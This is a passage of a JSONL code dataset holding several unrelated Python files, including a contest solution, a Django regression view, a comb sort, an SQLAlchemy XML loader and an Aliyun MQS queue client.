C$')\nplt.legend()\n\nplt.tight_layout()\n","sub_path":"chapter_3/1_single_class_coupled_IAQ.py","file_name":"1_single_class_coupled_IAQ.py","file_ext":"py","file_size_in_byte":2367,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"585611692","text":"# print(\"Enter first number\")\n#\n# a = input()\n#\n# print(\"Enter second number\")\n#\n# b = input()\n#\n# print(\"Sum is:\", int(a)+int(b))\n\n# mystr = \"Harry is a good boy\"\n# #[0:] take the whole string length\n# #[:6] start from 0 to 6\n# print(len(mystr))\n# print(mystr[::-1])\n\n#List\n\nstudent = [\"Khalid\",\"Usman\",\"Ali\",\"Khan\",\"ikram\"]\n\n# student.sort()\n# student.reverse()\n# course =[]\n# # Append\n# course.append('English')\n# course.append('Urdu')\n# course.append('Dari')\n# course.append('computer')\n#\n# print(course)\n\n# student.insert(2,'imran')\n# student.remove('imran')\n# student.pop()\n# print(student)\n\n# tuple is immutedable\n# tpl = (1,2,3,4)\n# print(type(tpl))\n\n# nested list\n# n_list = [\"happy\",[2,0,1,4,5]]\n# # nested index\n# print(n_list[0][1])\n# print(n_list[1][3])\n\n# List Sliceing\n\n# name_list = [\"k\",'h','a','l','i','d']\n# print(name_list)\n# print(\"=====SLicing=======\")\n# # negative indexing\n#\n# # print(len(name_list))\n# #\n# # print(name_list[-6])\n#\n# print(name_list[2:5])\n#\n# print(name_list[-6])\n#\n# print(name_list[5:])\nnum_list = [1,3,9]\n\nnum_list[2:2]= [7,5]\n\nprint(num_list)\n\n\n","sub_path":"hello.py","file_name":"hello.py","file_ext":"py","file_size_in_byte":1091,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"617284483","text":"visited = set()\ndef convert(array):\n for i in range(len(array) - 3):\n if (array[i] == array[i+1] and array[i] == array[i+2] and array[i] == array[i+3] and array[i] == 1):\n for t in range(len(array) - i):\n if (array[i+t] == 1):\n array[i+t] = 0\n else:\n break\n return array\ndef is_off(array):\n for i in array:\n if (i != 0):\n return False\n return True\ndef recur(array, steps):\n global visited\n next_array = []\n\n for arr in array:\n arr = convert(arr)\n if (tuple(arr) not in visited):\n visited.add(tuple(arr))\n if is_off(arr):\n return steps\n else:\n for i in range(len(arr)):\n if (arr[i] == 0):\n temp = list(arr)\n temp[i] = 1\n if (not(tuple(temp) in visited) and not(temp in next_array)):\n next_array.append(temp)\n\n return recur(next_array, steps + 1) \n\nn = int(input())\nlights = []\n\nfor i in range(n):\n lights.append(int(input()))\n \nprint(recur([lights], 0))","sub_path":"2011/CCC 2011 S5/S5.py","file_name":"S5.py","file_ext":"py","file_size_in_byte":1179,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"561620734","text":"'''\n@author Nicholas Wong\n@since 2nd August 2014\n\nWeek 2 - Question 4\n\"Write a recursive program to print out all possible permutations of a given string\"\n'''\n\ndef permut(array):\n if len(array) == 1:\n return [array]\n result = []\n for permutation in permut(array[1:]):\n for i in range(len(array)):\n result.append(permutation[:i] + array[0:1] + permutation[i:])\n return result\n\nif __name__ == '__main__':\n\tprint(permut(\"abc\"))","sub_path":"week02/Q4.py","file_name":"Q4.py","file_ext":"py","file_size_in_byte":461,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"127008001","text":"# 标签类\n# !/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# from Conversion.Tagging.NLP import NLP\nfrom Input.GWT import GWTObjects\n\n\nclass All_Tagged_GWTObject:\n def __init__(self, gwt: GWTObjects):\n # list类型,和gwt的story相同\n self.story = gwt.story\n # list类型,和gwt的scenario相同\n self.scenario = gwt.scenario\n # list类型,list中元素属性为Pre类,包含处理后的precondition和相应的Flag标签\n self.precondition = []\n # list类型,tag_of_action\n self.action = []\n # list类型,tag_of_postcondition\n self.postcondition = []\n\n # def add_type_into_action(self, gwt: GWTObjects):\n # nlp = NLP()\n # for action in gwt.when:\n # list1 = nlp.get_type_of_action(action)\n # self.action.extend(list1)\n #\n # def add_type_into_postcondition(self, gwt: GWTObjects):\n # nlp = NLP()\n # for postcon in gwt.then:\n # self.postcondition.extend(nlp.get_type_of_postcondition(postcon))\n #\n # def add_pre_into_precondition(self, gwt: GWTObjects):\n # '''\n # 将gwt对象Given的每一个都转换成Tag类,并加入到Tagged_gwt类的precondition中\n # :param gwt:输入的gwt对象\n # '''\n # nlp = NLP()\n # for precond in gwt.given:\n # self.precondition.append(nlp.get_flag_of_precondition(precond))\n\n\n def print_allTaggedGWTObject(self):\n print(self.story)\n print(self.scenario)\n for pre in self.precondition:\n print(pre.content + '[' + str(pre.flag) + ']')\n for ac in self.action:\n print(ac.content + '[' + ac.type + ']')\n for post in self.postcondition:\n print(post.content + '[' + post.type + ']')\n\n\nclass Tagged_GWTObject:\n # def __init__(self, gwt: GWTObjects):\n # # list类型,和gwt的story相同\n # self.story = gwt.story\n # # list类型,和gwt的scenario相同\n # self.scenario = gwt.scenario\n # # list类型,list中元素属性为Pre类,包含处理后的precondition和相应的Flag标签\n # self.precondition = []\n # # list类型,和gwt中的when相同\n # self.action = gwt.when\n # # list类型,和gwt中的then相同\n # self.postcondition = gwt.then\n\n def __init__(self, all_tagged_gwt: All_Tagged_GWTObject):\n self.story = all_tagged_gwt.story\n self.scenario = all_tagged_gwt.scenario\n self.precondition = all_tagged_gwt.precondition\n self.action = []\n self.postcondition = []\n for ac in all_tagged_gwt.action:\n self.action.append(ac.content)\n for post in all_tagged_gwt.postcondition:\n self.postcondition.append(post.content)\n\n # def add_pre_into_precondition(self, gwt: GWTObjects):\n # '''\n # 将gwt对象Given的每一个都转换成Pre类,并加入到Tag类的precondition中\n # :param gwt:输入的gwt对象\n # '''\n # nlp = NLP()\n # for precond in gwt.given:\n # self.precondition.append(nlp.get_flag_of_precondition(precond))\n\n def print_tag(self):\n print(self.story)\n print(self.scenario)\n for pre in self.precondition:\n print(pre.content)\n self.print_tag_switch(pre.flag)\n for action in self.action:\n print(action)\n for post in self.postcondition:\n print(post)\n\n def print_tag_switch(self, flag: int):\n '''\n flag中的switch/case\n '''\n flags = {\n 0: \"消极\" + \" \" + str(flag),\n 1: \"积极\" + \" \" + str(flag),\n 2: \"不是分支条件\",\n 3: \"GLOBAL 分支条件\"\n }\n print(flags.get(flag))\n","sub_path":"Conversion/Tagging/Tagged_GWTObject.py","file_name":"Tagged_GWTObject.py","file_ext":"py","file_size_in_byte":3794,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"614418341","text":"\"\"\"\nfile: test_programs.py\nAuthor: Aaron Bach\nEmail: bachya1208@gmail.com\nGithub: https://github.com/bachya/regenmaschine\n\"\"\"\n\n# -*- coding: utf-8 -*-\n# pylint: disable=no-self-use,too-few-public-methods,redefined-outer-name\n# pylint: disable=wildcard-import,unused-wildcard-import\n\nimport json\n\nimport requests_mock\n\nimport regenmaschine as rm\nfrom tests.fixtures.auth import *\nfrom tests.fixtures.misc import *\nfrom tests.fixtures.program import *\n\n\n# pylint: disable=too-many-arguments\ndef test_all_operations(client_general_response_200, local_cookies, local_url,\n local_auth_response_200, programs_all_response_200,\n programs_get_response_200,\n programs_nextrun_response_200,\n programs_running_response_200):\n \"\"\" Tests getting the program list \"\"\"\n with requests_mock.Mocker() as mock:\n mock.post(\n '{}/auth/login'.format(local_url),\n text=json.dumps(local_auth_response_200),\n cookies=local_cookies)\n mock.get(\n '{}/program'.format(local_url),\n text=json.dumps(programs_all_response_200),\n cookies=local_cookies)\n mock.get(\n '{}/program/nextrun'.format(local_url),\n text=json.dumps(programs_nextrun_response_200),\n cookies=local_cookies)\n mock.get(\n '{}/program/1'.format(local_url),\n text=json.dumps(programs_get_response_200),\n cookies=local_cookies)\n mock.post(\n '{}/program/1/start'.format(local_url),\n text=json.dumps(client_general_response_200),\n cookies=local_cookies)\n mock.post(\n '{}/program/1/stop'.format(local_url),\n text=json.dumps(client_general_response_200),\n cookies=local_cookies)\n mock.get(\n '{}/watering/program'.format(local_url),\n text=json.dumps(programs_running_response_200),\n cookies=local_cookies)\n\n auth = rm.Authenticator.create_local('192.168.1.100', '12345')\n client = rm.Client(auth).programs\n assert client.all() == programs_all_response_200\n assert client.get(1) == programs_get_response_200\n assert client.next() == programs_nextrun_response_200\n assert client.running() == programs_running_response_200\n assert client.start(1) == client_general_response_200\n assert client.stop(1) == client_general_response_200\n\n\n# pylint: disable=protected-access\ndef test_remote_api_broken(local_auth_response_200, local_url,\n remote_auth_response_200, remote_url, sprinkler_id):\n \"\"\" Tests the broken_remote_api decorator \"\"\"\n with requests_mock.Mocker() as mock:\n mock.post(\n '{}/login/auth'.format(remote_url),\n text=json.dumps(remote_auth_response_200),\n cookies=remote_cookies)\n mock.post(\n '{}/auth/login'.format(local_url),\n text=json.dumps(local_auth_response_200),\n cookies=local_cookies)\n mock.post(\n '{}/s/{}/api/4/program/1/start'.format(remote_url, sprinkler_id),\n exc=rm.exceptions.BrokenAPICall(\n 'start() currently broken in remote API'))\n\n auth_local = rm.Authenticator.create_local('192.168.1.100', '12345')\n auth_remote = rm.Authenticator.create_remote('user@host.com', '12345')\n\n with pytest.raises(rm.exceptions.BrokenAPICall) as exc_info:\n client = rm.Client(auth_remote)\n client.programs._broken_remote_api_test()\n assert 'currently broken in remote API' in str(exc_info)\n\n client = rm.Client(auth_local)\n assert client.programs._broken_remote_api_test() == {'status': 'ok'}\n","sub_path":"tests/test_programs.py","file_name":"test_programs.py","file_ext":"py","file_size_in_byte":3786,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"456184341","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\nfrom rest_framework.parsers import JSONParser\nfrom django.http.response import JsonResponse\nfrom django.views.decorators.csrf import csrf_exempt\nfrom valuate.serializers import UserInputSerializer\nfrom valuate.models import UserValuationDetails\nimport json\nimport csv\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn.linear_model import LinearRegression\n\ninput_data = []\n\ndef index(response):\n return HttpResponse(\"Connected\")\n\ndef getCity(response, city):\n return HttpResponse(\"City is {}\".format(city))\n\n@csrf_exempt\ndef export_csv(request):\n user_data=JSONParser().parse(request)\n data = user_data\n \n with open('writeData.csv', mode='w') as file:\n writer = csv.writer(file, delimiter=',', quotechar='\"', quoting=csv.QUOTE_MINIMAL)\n\n #way to write to csv file\n writer.writerow([\"Distance_Nearest_Town\",\"Perch\",\"Year\"])\n writer.writerow(data)\n print(data)\n return JsonResponse(data, safe= False)\n\ndef give_predictions(response):\n lr=LinearRegression()\n\n df=pd.read_csv(\"Galle_train_data.csv\")\n df.head()\n\n z=df[['Distance_Nearest_Town','Perch','Year']]\n lr.fit(z,df['Value_of_one_perch'])\n\n lr.intercept_\n lr.coef_[1]\n\n dfin=pd.read_csv(\"writeData.csv\")\n\n dfin.head()\n\n output=lr.intercept_+lr.coef_[0]*dfin.at[0,'Distance_Nearest_Town']+lr.coef_[1]*dfin.at[0,'Perch']+lr.coef_[2]*dfin.at[0,'Year']\n num = round(output, 2)\n return HttpResponse(num)\n\n@csrf_exempt\ndef get_valuate_inputs(request):\n user_inputs = JSONParser().parse(request)\n user_input_serializer = UserInputSerializer(data=user_inputs)\n if user_input_serializer.is_valid():\n user_input_serializer.save()\n return JsonResponse(\"Input Saved successfully..!\" , safe=False)\n return JsonResponse(\"Failed to Add.\",safe=False)\n\n@csrf_exempt\ndef get_saved_inputs(request):\n data = UserValuationDetails.objects.all()\n user_serializer = UserInputSerializer(data, many=True)\n return JsonResponse(user_serializer.data, safe=False)\n\n","sub_path":"Django/apiPy/valuate/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2117,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"233127773","text":"#!/usr/bin/env python\nfrom django.db.models import signals\nfrom django.utils.functional import curry\n\n\nclass CreatedByMiddleware(object):\n def __init__(self, get_response):\n self.get_response = get_response\n\n def __call__(self, request):\n response = self.process_request(request)\n if response is None:\n response = self.get_response(request)\n response = self.process_response(request, response)\n return response\n\n def process_request(self, request):\n if request.method in ('GET', 'HEAD', 'OPTIONS', 'TRACE'):\n user = None\n if hasattr(request, 'user') and request.user.is_authenticated:\n user = request.user\n\n mark_created_by = curry(self.mark_created_by, user)\n signals.pre_save.connect(mark_created_by, dispatch_uid=(self.__class__, request,), weak=False)\n\n def process_response(self, request, response):\n return response\n\n def mark_created_by(self, user, sender, instance, **kwargs):\n for field in instance._meta.fields:\n \"\"\"hasattr(instance, 'created_by') to avoid RelatedObjectDoesNotExist\"\"\"\n if 'created_by' == field.name:\n if not hasattr(instance, 'created_by'):\n instance.created_by = user\n","sub_path":"venv/Lib/site-packages/created_by/middleware.py","file_name":"middleware.py","file_ext":"py","file_size_in_byte":1294,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"435687568","text":"'''\n This module provides a comb sort algorithm implementation\n'''\n\ndef comb_sort(values):\n '''\n Sort values using the comb sort algorithm\n \n The comb sort algorithm is a bubble sort variant where the comparison is not\n done between 2 adjascent element but using a gap which is then decreased until\n it reaches the value of 1 in which case, we continue with the classical bubble sort\n '''\n did_swap = True\n gap = len(values)\n factor = 1.3\n \n while gap > 1 or did_swap:\n # reduce the gap\n gap = int(max(1, gap // factor))\n did_swap = False\n # Check for unordred bubbles\n for index in xrange(0, len(values)-gap, gap):\n if values[index] > values[index + gap]:\n # Swap values and set did_swap to true\n values[index], values[index + gap] = values[index + gap], values[index]\n did_swap = True\n \nif __name__ == \"__main__\":\n values = range(10)\n values.reverse()\n print (\"Before: {}\".format(values))\n comb_sort(values)\n print (\"After: {}\".format(values))","sub_path":"sort_tutorial/comb_sort.py","file_name":"comb_sort.py","file_ext":"py","file_size_in_byte":1105,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"641171084","text":"# bookhandler.py\nfrom sqlalchemy import *\nfrom sqlalchemy.orm import *\n \nimport xml.sax.handler\n\nimport configparser\nsettings = configparser.ConfigParser()\nsettings.read('config')\nuser = settings.get('database', 'user')\nurl = settings.get('database', 'url')\nevents_table = settings.get('database', 'events_table')\n\npg_db = create_engine('mysql://' + user + '@' + url)\n \nmetadata = MetaData(pg_db)\n \nevents_table = Table('events_first_try', metadata, autoload=True)\n\ni = 0\ndef mydefault():\n global i\n i += 1\n return i\n\n\nclass Events(object):\n Column('id', Integer, primary_key=True, default=mydefault)\n pass\n \nmapper(Events, events_table)\n \nclass EventsHandler(xml.sax.handler.ContentHandler):\n def __init__(self):\n self.buffer = \"\"\n self.inField = 0\n self.session = create_session(bind=pg_db)\n \n def startElement(self, name, attributes):\n if name == \"event\":\n self.event_id = attributes[\"id\"]\n elif name == \"title\":\n self.inField = 1\n elif name == \"url\":\n self.inField = 1\n elif name == \"description\":\n self.inField = 1\n elif name == \"start_time\":\n self.inField = 1\n elif name == \"end_time\":\n self.inField = 1\n elif name == \"venue_url\":\n self.inField = 1\n elif name == \"venue_address\":\n self.inField = 1\n elif name == \"city_name\":\n self.inField = 1\n elif name == \"latitude\":\n self.inField = 1\n elif name == \"longitude\":\n self.inField = 1\n elif name == \"postal_code\":\n self.inField = 1\n elif name == \"category\":\n self.inField = 1\n\n \n def characters(self, data):\n if self.inField:\n self.buffer += data\n \n def endElement(self, name):\n if name == \"event\":\n self.session.begin()\n self.newevent = Events()\n self.newevent.id = self.event_id\n self.newevent.title = self.title\n self.newevent.url = self.url\n self.newevent.description = self.description\n self.newevent.start_time = self.start_time\n self.newevent.end_time = self.end_time\n self.newevent.venue_url = self.venue_url\n self.newevent.venue_address = self.venue_address\n self.newevent.city_name = self.city_name\n self.newevent.latitude = self.latitude\n self.newevent.longitude = self.longitude\n self.newevent.postal_code = self.postal_code\n self.newevent.category = self.category\n self.session.add(self.newevent)\n self.session.commit()\n elif name == \"title\":\n self.inField = 0\n self.title = self.buffer\n elif name == \"url\":\n self.inField = 0\n self.url = self.buffer\n elif name == \"description\":\n self.inField = 0\n self.description = self.buffer\n elif name == \"start_time\":\n self.inField = 0\n self.start_time = self.buffer\n elif name == \"stop_time\":\n self.inField = 0\n self.end_time = self.buffer\n elif name == \"venue_url\":\n self.inField = 0\n self.venue_url = self.buffer\n elif name == \"venue_address\":\n self.inField = 0\n self.venue_address = self.buffer\n elif name == \"city_name\":\n self.inField = 0\n self.city_name = self.buffer\n elif name == \"latitude\":\n self.inField = 0\n self.latitude = self.buffer\n elif name == \"longitude\":\n self.inField = 0\n self.longitude = self.buffer\n elif name == \"postal_code\":\n self.inField = 0\n self.postal_code = self.buffer\n elif name == \"category\":\n self.inField = 0\n self.category = self.buffer\n self.buffer = \"\"","sub_path":"data-collection/xml_db_model.py","file_name":"xml_db_model.py","file_ext":"py","file_size_in_byte":3945,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"406705836","text":"import math\nimport random\nimport json\n\n\nclass Node:\n def __init__(self, lb, tb):\n self.val = None\n self.mb = None\n self.lb = lb # prev left branch\n self.tb = tb # prev top branch\n self.opt = None\n\n def calculate_mb(self):\n self.mb = math.sqrt(self.tb[0] ** 2 + self.lb[0] ** 2)\n\n\ndef algorithm(cur_node, v, prev_node):\n if cur_node.val == None or cur_node.val>v:\n cur_node.val=v\n cur_node.opt=prev_node\n elif cur_node.val<v:\n return\n\n if cur_node.lb != None:\n algorithm(cur_node.lb[0], cur_node.lb[1]+v, cur_node)\n if cur_node.tb != None:\n algorithm(cur_node.tb[0], cur_node.tb[1]+v, cur_node)\n \n\n\ndef gen_rawdata(y, x):\n rawdata = []\n for row in range(y):\n cur_row = []\n for col in range(x):\n cur_row.append([random.randint(1, 10), random.randint(1, 10)])\n rawdata.append(cur_row)\n return rawdata\n\n\ndef gen_nodes(rawdata):\n nodes = []\n for y, row in enumerate(rawdata):\n cur_row = []\n for x, col in enumerate(row):\n if x == 0:\n lb = None\n else:\n lb = [cur_row[x - 1], col[0]]\n if y == 0:\n tb = None\n else:\n tb = [nodes[y - 1][x], col[1]]\n cur_row.append(Node(lb, tb))\n nodes.append(cur_row)\n return nodes\n\ndef print_nodes(nodes):\n for row in nodes:\n for col in row:\n print(f\"[{col.val}]\", end=\"\")\n print(\"\")\n print(\"\\n\")\n\ndef optimal_path(cur_node):\n if cur_node.opt == None:\n return\n print(cur_node.val)\n optimal_path(cur_node.opt)\n\ndef main():\n x,y=7,6;\n\n rawdata=gen_rawdata(y,x)\n\n with open('example_data.json', 'r') as file:\n rawdata=json.load(file)\n\n nodes = gen_nodes(rawdata)\n nodes[y-1][x-1].val=0\n\n print_nodes(nodes)\n\n algorithm(nodes[y-1][x-1],0, None)\n\n print_nodes(nodes)\n\n optimal_path(nodes[0][0])\n\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2023,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"531113780","text":"# -*- coding: utf-8 -*-\n\nimport time\nimport hashlib\nimport hmac\nimport string\n\nfrom mqs_xml_handler import *\nfrom mqs_tool import *\nfrom mqs_http import *\n\n\nGET_ACCOUNT_STATUS = 200\nCREATE_QUEUE_STATUS = 201\nDELETE_QUEUE_STATUS = 204\nLIST_QUEUE_STATUS = 200\nSET_QUEUE_ATTRIBUTES_STATUS = 200\nSEND_MESSAGE_STATUS = 201\nRECEIVE_MESSAGE_STATUS = 200\nDELETE_MESSAGE_STATUS = 204\nPEEK_MESSAGE_STATUS = 200\nCHANGE_MESSAGE_VISIBILITY_STATUS = 200\nSET_POLICY_STATUS = 204\nDELETE_POLICY_STATUS = 204\nGET_POLICY_STATUS = 200\n\nclass MQSClient:\n __max_listener_number = 50\n def __init__(self, host, accessId, accessKey, version = \"2014-07-08\"):\n self.mHost = host\n self.mAccessId = accessId\n self.mAccessKey = accessKey\n self.mHttp = MQSHttp()\n self.mVersion = version\n\n def set_connection_timeout(self, connTimeout):\n self.mHttp.set_connection_timeout(connTimeout)\n\n#===============================================sdk===============================================#\n \n def create_queue(self, req, resp):\n #check parameter\n CreateQueueValidator.validate(req)\n\n #make request internal\n req_inter = RequestInternal(req.method, \"/%s\" % req.queue_name)\n req_inter.data = QueueEncoder.encode(req)\n self.build_header(req, req_inter)\n\n #send request\n resp_inter = self.mHttp.send_request(req_inter)\n\n #handle result, make response\n resp.status = resp_inter.status\n resp.header = resp_inter.header\n self.check_status(CREATE_QUEUE_STATUS, resp_inter, resp)\n if resp.error_data == \"\":\n resp.queue_url = resp.header[\"location\"]\n\n def delete_queue(self, req, resp):\n #check parameter\n DeleteQueueValidator.validate(req)\n\n #make request internal\n req_inter = RequestInternal(req.method, \"/%s\" % req.queue_name)\n self.build_header(req, req_inter)\n\n #send request\n resp_inter = self.mHttp.send_request(req_inter)\n\n #handle result, make response\n resp.status = resp_inter.status\n resp.header = resp_inter.header\n self.check_status(DELETE_QUEUE_STATUS, resp_inter, resp)\n\n def list_queue(self, req, resp):\n #check parameter\n ListQueueValidator.validate(req)\n\n #make request internal\n req_inter = RequestInternal(req.method, \"/\")\n if req.prefix != \"\":\n req_inter.header[\"x-mqs-prefix\"] = req.prefix\n if req.ret_number != -1:\n req_inter.header[\"x-mqs-ret-number\"] = str(req.ret_number)\n if req.marker != \"\":\n req_inter.header[\"x-mqs-marker\"] = str(req.marker)\n if req.with_meta:\n req_inter.header[\"x-mqs-with-meta\"] = \"true\"\n self.build_header(req, req_inter)\n\n #send request\n resp_inter = self.mHttp.send_request(req_inter)\n\n #handle result, make response\n resp.status = resp_inter.status\n resp.header = resp_inter.header\n self.check_status(LIST_QUEUE_STATUS, resp_inter, resp)\n if resp.error_data == \"\":\n resp.queueurl_list, resp.next_marker, resp.queuemeta_list = ListQueueDecoder.decode(resp_inter.data, req)\n\n def set_queue_attributes(self, req, resp):\n #check parameter\n SetQueueAttrValidator.validate(req)\n\n #make request internal\n req_inter = RequestInternal(req.method, \"/%s?metaoverride=true\" % (req.queue_name))\n req_inter.data = QueueEncoder.encode(req, False)\n self.build_header(req, req_inter)\n\n #send request\n resp_inter = self.mHttp.send_request(req_inter)\n\n #handle result, make response \n resp.status = resp_inter.status\n resp.header = resp_inter.header\n self.check_status(SET_QUEUE_ATTRIBUTES_STATUS, resp_inter, resp)\n\n def get_queue_attributes(self, req, resp):\n #check parameter\n GetQueueAttrValidator.validate(req)\n\n #make request internal\n req_inter = RequestInternal(req.method, \"/%s\" % req.queue_name)\n self.build_header(req, req_inter)\n\n #send request\n resp_inter = self.mHttp.send_request(req_inter)\n\n #handle result, make response\n resp.status = resp_inter.status\n resp.header = resp_inter.header\n self.check_status(SET_QUEUE_ATTRIBUTES_STATUS, resp_inter, resp)\n if resp.error_data == \"\":\n queue_attr = GetQueueAttrDecoder.decode(resp_inter.data)\n resp.active_messages = string.atol(queue_attr[\"ActiveMessages\"])\n resp.create_time = string.atol(queue_attr[\"CreateTime\"])\n resp.delay_messages = string.atol(queue_attr[\"DelayMessages\"])\n resp.delay_seconds = string.atol(queue_attr[\"DelaySeconds\"])\n resp.inactive_messages = string.atol(queue_attr[\"InactiveMessages\"])\n resp.last_modify_time = string.atol(queue_attr[\"LastModifyTime\"])\n resp.maximum_message_size = string.atol(queue_attr[\"MaximumMessageSize\"])\n resp.message_retention_period = string.atol(queue_attr[\"MessageRetentionPeriod\"])\n resp.queue_name = queue_attr[\"QueueName\"]\n resp.visibility_timeout = string.atol(queue_attr[\"VisibilityTimeout\"])\n resp.polling_wait_seconds = string.atol(queue_attr[\"PollingWaitSeconds\"])\n\n def send_message(self, req, resp):\n #check parameter\n SendMessageValidator.validate(req)\n\n #make request internal\n req_inter = RequestInternal(req.method, uri = \"/%s/messages\" % req.queue_name)\n req_inter.data = MessageEncoder.encode(req)\n self.build_header(req, req_inter)\n\n #send request\n resp_inter = self.mHttp.send_request(req_inter)\n\n #handle result, make response\n resp.status = resp_inter.status\n resp.header = resp_inter.header\n self.check_status(SEND_MESSAGE_STATUS, resp_inter, resp)\n if resp.error_data == \"\":\n resp.message_id, resp.message_body_md5 = SendMessageDecoder.decode(resp_inter.data)\n\n def receive_message(self, req, resp):\n #check parameter\n ReceiveMessageValidator.validate(req)\n\n #make request internal\n req_inter = RequestInternal(req.method, \"/%s/messages\" % req.queue_name)\n self.build_header(req, req_inter)\n\n #send request\n resp_inter = self.mHttp.send_request(req_inter)\n\n #handle result, make response\n resp.status = resp_inter.status\n resp.header = resp_inter.header\n self.check_status(RECEIVE_MESSAGE_STATUS, resp_inter, resp)\n if resp.error_data == \"\":\n data = RecvMessageDecoder.decode(resp_inter.data, req)\n self.make_recvresp(data, resp)\n\n def delete_message(self, req, resp):\n #check parameter\n DeleteMessageValidator.validate(req)\n\n #make request internal\n req_inter = RequestInternal(req.method, \"/%s/messages?ReceiptHandle=%s\" % (req.queue_name, req.receipt_handle))\n self.build_header(req, req_inter)\n\n #send request\n resp_inter = self.mHttp.send_request(req_inter)\n\n #handle result, make response\n resp.status = resp_inter.status\n resp.header = resp_inter.header\n self.check_status(DELETE_MESSAGE_STATUS, resp_inter, resp)\n\n def peek_message(self, req, resp):\n #check parameter\n PeekMessageValidator.validate(req)\n\n #make request internal\n req_inter = RequestInternal(req.method, \"/%s/messages?peekonly=true\" % req.queue_name)\n self.build_header(req, req_inter)\n\n #send request\n resp_inter = self.mHttp.send_request(req_inter)\n\n #handle result, make response\n resp.status = resp_inter.status\n resp.header = resp_inter.header\n self.check_status(PEEK_MESSAGE_STATUS, resp_inter, resp)\n if resp.error_data == \"\":\n data = PeekMessageDecoder.decode(resp_inter.data, req)\n self.make_peekresp(data, resp)\n\n def change_message_visibility(self, req, resp):\n #check parameter\n ChangeMsgVisValidator.validate(req)\n\n #make request internal\n req_inter = RequestInternal(req.method, \"/%s/messages?ReceiptHandle=%s&VisibilityTimeout=%d\" % (req.queue_name, req.receipt_handle, req.visibility_timeout))\n self.build_header(req, req_inter)\n\n #send request\n resp_inter = self.mHttp.send_request(req_inter)\n\n #handle result, make response\n resp.status = resp_inter.status\n resp.header = resp_inter.header\n self.check_status(CHANGE_MESSAGE_VISIBILITY_STATUS, resp_inter, resp)\n if resp.error_data == \"\":\n resp.receipt_handle, resp.next_visible_time = ChangeMsgVisDecoder.decode(resp_inter.data)\n\n \n################################################################################################### \n#----------------------internal-------------------------------------------------------------------#\n def build_header(self, req, req_inter):\n if req_inter.data != \"\":\n req_inter.header[\"content-md5\"] = base64.b64encode(hashlib.md5(req_inter.data).hexdigest())\n req_inter.header[\"content-type\"] = \"text/xml;charset=UTF-8\"\n req_inter.header[\"x-mqs-version\"] = self.mVersion\n req_inter.header[\"host\"] = self.mHost\n req_inter.header[\"date\"] = time.strftime(\"%a, %d %b %Y %H:%M:%S GMT\", time.gmtime())\n req_inter.header[\"Authorization\"] = self.get_signature(req_inter.method, req_inter.header, req_inter.uri)\n\n def get_signature(self,method,headers,resource):\n content_md5 = self.get_element('content-md5', headers)\n content_type = self.get_element('content-type', headers)\n date = self.get_element('date', headers)\n canonicalized_resource = resource\n canonicalized_mqs_headers = \"\"\n if len(headers) > 0:\n x_header_list = headers.keys()\n x_header_list.sort()\n for k in x_header_list:\n if k.startswith('x-mqs-'):\n canonicalized_mqs_headers += k + \":\" + headers[k] + \"\\n\"\n string_to_sign = \"%s\\n%s\\n%s\\n%s\\n%s%s\" % (method, content_md5, content_type, date, canonicalized_mqs_headers, canonicalized_resource)\n h = hmac.new(self.mAccessKey, string_to_sign, hashlib.sha1)\n signature = base64.b64encode(h.digest())\n signature = \"MQS \" + self.mAccessId + \":\" + signature\n return signature\n\n def get_element(self, name, container):\n if name in container:\n return container[name]\n else:\n return \"\"\n\n def check_status(self, expect_status, resp_inter, resp):\n if resp_inter.status == expect_status or (resp_inter.status >= 300 and resp_inter.status < 400):\n resp.error_data = \"\"\n else:\n resp.error_data = resp_inter.data\n if resp_inter.status >= 400 and resp_inter.status <= 600:\n error = ErrorDecoder.decode(resp.error_data)\n raise MQSServerException(error[\"Code\"], error[\"Message\"], error[\"RequestId\"], error[\"HostId\"])\n else:\n raise MQSClientNetworkException(\"UnkownError\", resp_inter.data)\n\n def make_recvresp(self, data, resp):\n resp.dequeue_count = string.atol(data[\"DequeueCount\"])\n resp.enqueue_time = string.atol(data[\"EnqueueTime\"])\n resp.first_dequeue_time = string.atol(data[\"FirstDequeueTime\"])\n resp.message_body = data[\"MessageBody\"]\n resp.message_id = data[\"MessageId\"]\n resp.message_body_md5 = data[\"MessageBodyMD5\"]\n resp.next_visible_time = string.atol(data[\"NextVisibleTime\"])\n resp.receipt_handle = data[\"ReceiptHandle\"]\n resp.priority = string.atol(data[\"Priority\"])\n\n def make_peekresp(self, data, resp):\n resp.dequeue_count = string.atol(data[\"DequeueCount\"])\n resp.enqueue_time = string.atol(data[\"EnqueueTime\"])\n resp.first_dequeue_time = string.atol(data[\"FirstDequeueTime\"])\n resp.message_body = data[\"MessageBody\"]\n resp.message_id = data[\"MessageId\"]\n resp.message_body_md5 = data[\"MessageBodyMD5\"]\n resp.priority = string.atol(data[\"Priority\"])\n","sub_path":"kombu_aliyun_mqs/aliyun_mqs/mqs_client.py","file_name":"mqs_client.py","file_ext":"py","file_size_in_byte":12164,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} 